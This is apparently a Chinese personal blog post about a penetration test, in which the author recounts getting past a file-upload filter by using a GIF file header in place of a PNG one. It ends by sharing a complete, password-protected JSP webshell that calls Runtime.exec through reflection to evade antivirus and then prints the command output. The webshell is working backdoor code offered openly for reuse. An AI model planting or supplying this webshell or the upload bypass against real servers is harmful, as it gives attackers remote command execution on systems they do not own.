从毕业到现在接近3年了,也是终于迈出了跳槽的一步,本身不是很想跳槽,但是各种原因吧,还是跟上家公司说拜拜了,呆了2年多,进步了很多,感谢上家提供的平台,这篇故事发生在我入职新公司的第一天,上家公司我的一位组员,找到我,感觉这个可以学习一下,主要是一个渗透思路问题。
懒得打字了,上传的地方就大约是这个情况 ,看聊天聊天记录吧,大概就是可以上传webshell,但是报错
下班后回家做了一顿饭,因为是跟xe合租的房子,他对象出去有事,只能我亲自下厨,因为是刚搬过来,没有锅盖,直接起锅烧油,洗菜盆子一盖
味道可以,给我自己厨艺打个满分
吃完饭后我就打开电脑测试了一下,确实是检测文件头,
没有文件头就直接200.返回包什么东西都没有,带
文件头成功上传,并且返回上传路径
访问webshell 500,这里的500并不是冰蝎马那种500,因为我上传的是123456,本身并不应该报错
然后我换了一下JSPX 还是报错,提示空指针,不是马的问题
后来回看jsp的报错信息,仔细看发现报错原因居然是因为我们的图片马的文件头
具体是因为我们的png文件头不是UTF-8编码,但是删掉文件头又上传不上去,
一直在寻找躲避这个错误的方法,后来一想,gif的文件头可以是纯UTF-8编码的,测试一下传了个马正常上传
访问一下webshell看看还报错吗,无情,直接给我来了一句网络安全为人民,网络安全靠人民
转战免杀马继续测试,成功上传并且执行命令
最后分享一下免杀的cmd马
<%@ page language="java" pageEncoding="UTF-8" %>
<%
// 加入一个密码
String PASSWORD = "password";
String passwd = request.getParameter("pwd");
String cmd = request.getParameter("cmd");
if (!passwd.equals(PASSWORD)) {
return;
}
// 反射调用
Class rt = Class.forName("java.lang.Runtime");
java.lang.reflect.Method gr = rt.getMethod("getRuntime");
java.lang.reflect.Method ex = rt.getMethod("exec", String.class);
Process process = (Process) ex.invoke(gr.invoke(null), cmd);
// 类似上文做回显
java.io.InputStream in = process.getInputStream();
out.print("<pre>");
java.io.InputStreamReader resultReader = new java.io.InputStreamReader(in);
java.io.BufferedReader stdInput = new java.io.BufferedReader(resultReader);
String s = null;
while ((s = stdInput.readLine()) != null) {
out.println(s);
}
out.print("</pre>");
%>还是那句话,代码是人写的,规则也是人配置的,渗透最重要的就是思路,好的思路会让你成长的更快
3052
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
